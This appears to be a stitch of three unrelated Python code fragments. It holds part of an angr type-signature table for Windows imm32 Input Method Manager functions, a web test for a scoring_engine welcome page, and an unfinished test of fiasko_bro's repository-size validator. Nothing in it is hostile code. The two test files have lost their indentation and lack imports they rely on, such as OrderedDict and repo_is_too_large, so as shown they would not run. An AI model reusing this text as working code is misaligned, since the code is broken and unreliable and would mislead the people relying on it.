'ImmSetCompositionFontA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"lfHeight": SimTypeInt(signed=True, label="Int32"), "lfWidth": SimTypeInt(signed=True, label="Int32"), "lfEscapement": SimTypeInt(signed=True, label="Int32"), "lfOrientation": SimTypeInt(signed=True, label="Int32"), "lfWeight": SimTypeInt(signed=True, label="Int32"), "lfItalic": SimTypeChar(label="Byte"), "lfUnderline": SimTypeChar(label="Byte"), "lfStrikeOut": SimTypeChar(label="Byte"), "lfCharSet": SimTypeChar(label="Byte"), "lfOutPrecision": SimTypeChar(label="Byte"), "lfClipPrecision": SimTypeChar(label="Byte"), "lfQuality": SimTypeChar(label="Byte"), "lfPitchAndFamily": SimTypeChar(label="Byte"), "lfFaceName": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 32)}, name="LOGFONTA", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lplf"]),
#
'ImmSetCompositionFontW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"lfHeight": SimTypeInt(signed=True, label="Int32"), "lfWidth": SimTypeInt(signed=True, label="Int32"), "lfEscapement": SimTypeInt(signed=True, label="Int32"), "lfOrientation": SimTypeInt(signed=True, label="Int32"), "lfWeight": SimTypeInt(signed=True, label="Int32"), "lfItalic": SimTypeChar(label="Byte"), "lfUnderline": SimTypeChar(label="Byte"), "lfStrikeOut": SimTypeChar(label="Byte"), "lfCharSet": SimTypeChar(label="Byte"), "lfOutPrecision": SimTypeChar(label="Byte"), "lfClipPrecision": SimTypeChar(label="Byte"), "lfQuality": SimTypeChar(label="Byte"), "lfPitchAndFamily": SimTypeChar(label="Byte"), "lfFaceName": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 32)}, name="LOGFONTW", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lplf"]),
#
'ImmConfigureIMEA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmConfigureIMEW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmEscapeA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmEscapeW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmGetConversionListA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "dwCount": SimTypeInt(signed=False, label="UInt32"), "dwSelection": SimTypeInt(signed=False, label="UInt32"), "dwPageStart": SimTypeInt(signed=False, label="UInt32"), "dwPageSize": SimTypeInt(signed=False, label="UInt32"), "dwOffset": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CANDIDATELIST", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="GET_CONVERSION_LIST_FLAG")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "lpSrc", "lpDst", "dwBufLen", "uFlag"]),
#
'ImmGetConversionListW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "dwCount": SimTypeInt(signed=False, label="UInt32"), "dwSelection": SimTypeInt(signed=False, label="UInt32"), "dwPageStart": SimTypeInt(signed=False, label="UInt32"), "dwPageSize": SimTypeInt(signed=False, label="UInt32"), "dwOffset": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CANDIDATELIST", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="GET_CONVERSION_LIST_FLAG")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "lpSrc", "lpDst", "dwBufLen", "uFlag"]),
#
'ImmNotifyIME': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="NOTIFY_IME_ACTION"), SimTypeInt(signed=False, label="NOTIFY_IME_INDEX"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "dwAction", "dwIndex", "dwValue"]),
#
'ImmGetStatusWindowPos': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpptPos"]),
#
'ImmSetStatusWindowPos': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpptPos"]),
#
'ImmGetCompositionWindow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwStyle": SimTypeInt(signed=False, label="UInt32"), "ptCurrentPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "rcArea": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)}, name="COMPOSITIONFORM", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpCompForm"]),
#
'ImmSetCompositionWindow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwStyle": SimTypeInt(signed=False, label="UInt32"), "ptCurrentPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "rcArea": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)}, name="COMPOSITIONFORM", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpCompForm"]),
#
'ImmGetCandidateWindow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwIndex": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "ptCurrentPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "rcArea": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)}, name="CANDIDATEFORM", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "lpCandidate"]),
#
'ImmSetCandidateWindow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwIndex": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "ptCurrentPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "rcArea": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)}, name="CANDIDATEFORM", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpCandidate"]),
#
'ImmIsUIMessageA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmIsUIMessageW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmGetVirtualKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0"]),
#
'ImmRegisterWordA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpszReading", "param2", "lpszRegister"]),
#
'ImmRegisterWordW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpszReading", "param2", "lpszRegister"]),
#
'ImmUnregisterWordA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpszReading", "param2", "lpszUnregister"]),
#
'ImmUnregisterWordW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpszReading", "param2", "lpszUnregister"]),
#
'ImmGetRegisterWordStyleA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwStyle": SimTypeInt(signed=False, label="UInt32"), "szDescription": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 32)}, name="STYLEBUFA", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "nItem", "lpStyleBuf"]),
#
'ImmGetRegisterWordStyleW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwStyle": SimTypeInt(signed=False, label="UInt32"), "szDescription": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 32)}, name="STYLEBUFW", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "nItem", "lpStyleBuf"]),
#
'ImmEnumRegisterWordA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["lpszReading", "param1", "lpszString", "param3"]), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "lpszReading", "param3", "lpszRegister", "param5"]),
#
'ImmEnumRegisterWordW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["lpszReading", "param1", "lpszString", "param3"]), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "lpszReading", "param3", "lpszRegister", "param5"]),
#
'ImmDisableIME': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmEnumInputContext': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1"]), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["idThread", "lpfn", "lParam"]),
#
'ImmGetImeMenuItemsA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "fType": SimTypeInt(signed=False, label="UInt32"), "fState": SimTypeInt(signed=False, label="UInt32"), "wID": SimTypeInt(signed=False, label="UInt32"), "hbmpChecked": SimTypeBottom(label="HBITMAP"), "hbmpUnchecked": SimTypeBottom(label="HBITMAP"), "dwItemData": SimTypeInt(signed=False, label="UInt32"), "szString": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 80), "hbmpItem": SimTypeBottom(label="HBITMAP")}, name="IMEMENUITEMINFOA", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "fType": SimTypeInt(signed=False, label="UInt32"), "fState": SimTypeInt(signed=False, label="UInt32"), "wID": SimTypeInt(signed=False, label="UInt32"), "hbmpChecked": SimTypeBottom(label="HBITMAP"), "hbmpUnchecked": SimTypeBottom(label="HBITMAP"), "dwItemData": SimTypeInt(signed=False, label="UInt32"), "szString": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 80), "hbmpItem": SimTypeBottom(label="HBITMAP")}, name="IMEMENUITEMINFOA", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2", "lpImeParentMenu", "lpImeMenu", "dwSize"]),
#
'ImmGetImeMenuItemsW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "fType": SimTypeInt(signed=False, label="UInt32"), "fState": SimTypeInt(signed=False, label="UInt32"), "wID": SimTypeInt(signed=False, label="UInt32"), "hbmpChecked": SimTypeBottom(label="HBITMAP"), "hbmpUnchecked": SimTypeBottom(label="HBITMAP"), "dwItemData": SimTypeInt(signed=False, label="UInt32"), "szString": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 80), "hbmpItem": SimTypeBottom(label="HBITMAP")}, name="IMEMENUITEMINFOW", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "fType": SimTypeInt(signed=False, label="UInt32"), "fState": SimTypeInt(signed=False, label="UInt32"), "wID": SimTypeInt(signed=False, label="UInt32"), "hbmpChecked": SimTypeBottom(label="HBITMAP"), "hbmpUnchecked": SimTypeBottom(label="HBITMAP"), "dwItemData": SimTypeInt(signed=False, label="UInt32"), "szString": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 80), "hbmpItem": SimTypeBottom(label="HBITMAP")}, name="IMEMENUITEMINFOW", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2", "lpImeParentMenu", "lpImeMenu", "dwSize"]),
#
'ImmDisableTextFrameService': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["idThread"]),
#
'ImmDisableLegacyIME': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'ImmGetHotKey': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpuModifiers", "lpuVKey", "phKL"]),
#
'ImmSetHotKey': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmGenerateMessage': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmRequestMessageA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1", "param2"]),
#
'ImmRequestMessageW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1", "param2"]),
#
'ImmCreateSoftKeyboard': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=True, label="Int32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmDestroySoftKeyboard': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmShowSoftKeyboard': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1"]),
#
'ImmLockIMC': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimStruct({"hWnd": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "fOpen": SimTypeInt(signed=True, label="Int32"), "ptStatusWndPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "ptSoftKbdPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "fdwConversion": SimTypeInt(signed=False, label="UInt32"), "fdwSentence": SimTypeInt(signed=False, label="UInt32"), "lfFont": SimUnion({"A": SimTypeBottom(label="LOGFONTA"), "W": SimTypeBottom(label="LOGFONTW")}, name="<anon>", label="None"), "cfCompForm": SimStruct({"dwStyle": SimTypeInt(signed=False, label="UInt32"), "ptCurrentPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "rcArea": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)}, name="COMPOSITIONFORM", pack=False, align=None), "cfCandForm": SimTypeFixedSizeArray(SimStruct({"dwIndex": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "ptCurrentPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "rcArea": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)}, name="CANDIDATEFORM", pack=False, align=None), 4), 
"hCompStr": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "hCandInfo": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "hGuideLine": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "hPrivate": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "dwNumMsgBuf": SimTypeInt(signed=False, label="UInt32"), "hMsgBuf": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "fdwInit": SimTypeInt(signed=False, label="UInt32"), "dwReserve": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 3)}, name="INPUTCONTEXT", pack=False, align=None), offset=0), arg_names=["param0"]),
#
'ImmUnlockIMC': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmGetIMCLockCount': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0"]),
#
'ImmCreateIMCC': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0"]),
#
'ImmDestroyIMCC': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0"]),
#
'ImmLockIMCC': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeBottom(label="Void"), offset=0), arg_names=["param0"]),
#
'ImmUnlockIMCC': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmGetIMCCLockCount': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0"]),
#
'ImmReSizeIMCC': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1"]),
#
'ImmGetIMCCSize': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0"]),
}
lib.set_prototypes(prototypes)
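The table above pairs each imm32 export with an angr `SimTypeFunction` signature, and the ANSI/Unicode siblings (`ImmRegisterWordA`/`ImmRegisterWordW`, `ImmIsUIMessageA`/`W`, ...) differ only in their string pointer element type (`Byte` vs `Char`). A stdlib-only sketch of that `A`/`W` naming convention; `aw_pairs` is an illustrative helper, not part of angr:

```python
def aw_pairs(names):
    """Group Win32 export names into base -> sorted variant tuples,
    counting a name as paired only when both A and W twins exist."""
    names = set(names)
    pairs = {}
    for name in names:
        if name.endswith(('A', 'W')):
            base, variant = name[:-1], name[-1]
            sibling = base + ('W' if variant == 'A' else 'A')
            if sibling in names:
                pairs.setdefault(base, set()).add(variant)
    return {base: tuple(sorted(vs)) for base, vs in pairs.items()}

exports = ['ImmRegisterWordA', 'ImmRegisterWordW', 'ImmGetVirtualKey']
print(aw_pairs(exports))  # {'ImmRegisterWord': ('A', 'W')}
```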
# tests/scoring_engine/web/test_welcome.py (yeyintminthuhtut/scoring_engine @ 679021c00fcab5032078665d17d4b102346347f1, MIT)
from tests.scoring_engine.web.web_test import WebTest
class TestWelcome(WebTest):
def setup(self):
super(TestWelcome, self).setup()
self.expected_sponsorship_images = OrderedDict()
        placeholder = '/static/images/logo-placeholder.jpg'
        self.expected_sponsorship_images['diamond'] = [placeholder] * 3
        self.expected_sponsorship_images['platinum'] = [placeholder] * 3
        self.expected_sponsorship_images['somecustomlevel'] = [placeholder] * 6
        self.expected_sponsorship_images['gold'] = [placeholder] * 3
def test_home(self):
resp = self.client.get('/')
assert self.mock_obj.call_args == self.build_args('welcome.html', sponsorship_images=self.expected_sponsorship_images)
assert resp.status_code == 200
def test_home_index(self):
resp = self.client.get('/index')
assert self.mock_obj.call_args == self.build_args('welcome.html', sponsorship_images=self.expected_sponsorship_images)
assert resp.status_code == 200
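The assertions above compare `self.mock_obj.call_args` against `self.build_args(...)`: the template renderer is replaced by a mock (presumably via `unittest.mock.patch` inside `WebTest`) and its recorded call is checked for equality. A self-contained sketch of that pattern; the `render`/`make_view` names are stand-ins, not WebTest's actual internals:

```python
from unittest import mock

def make_view(render):
    # the route handler calls whatever renderer it is given
    def view():
        return render('welcome.html', sponsorship_images={'gold': []})
    return view

mock_render = mock.Mock()
make_view(mock_render)()

# call_args compares equal to a mock.call(...) built from the same
# args/kwargs, which is what build_args() produces in the tests above
assert mock_render.call_args == mock.call(
    'welcome.html', sponsorship_images={'gold': []})
```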
# tests/test_size_validators/test_are_repos_too_large.py (SerejkaSJ/fiasko_bro @ dfb8c30109f317c1e5b6d211e002fd148695809e, MIT)
from fiasko_bro import defaults
def test_repo_size_fail_single(general_repo_path):
max_py_files_count = 1
directories_to_skip = defaults.VALIDATION_PARAMETERS['directories_to_skip']
output = repo_is_too_large(general_repo_path, directories_to_skip, max_py_files_count)
assert isinstance(output, str)
def test_repo_size_fail_double(general_repo_path, general_repo_origin_path):
max_py_files_count = 1
directories_to_skip = defaults.VALIDATION_PARAMETERS['directories_to_skip']
output = repo_is_too_large(
general_repo_path,
directories_to_skip,
max_py_files_count,
general_repo_origin_path
)
assert isinstance(output, str)
def test_repo_size_ok_single(general_repo_path):
max_py_files_count = 1000
directories_to_skip = defaults.VALIDATION_PARAMETERS['directories_to_skip']
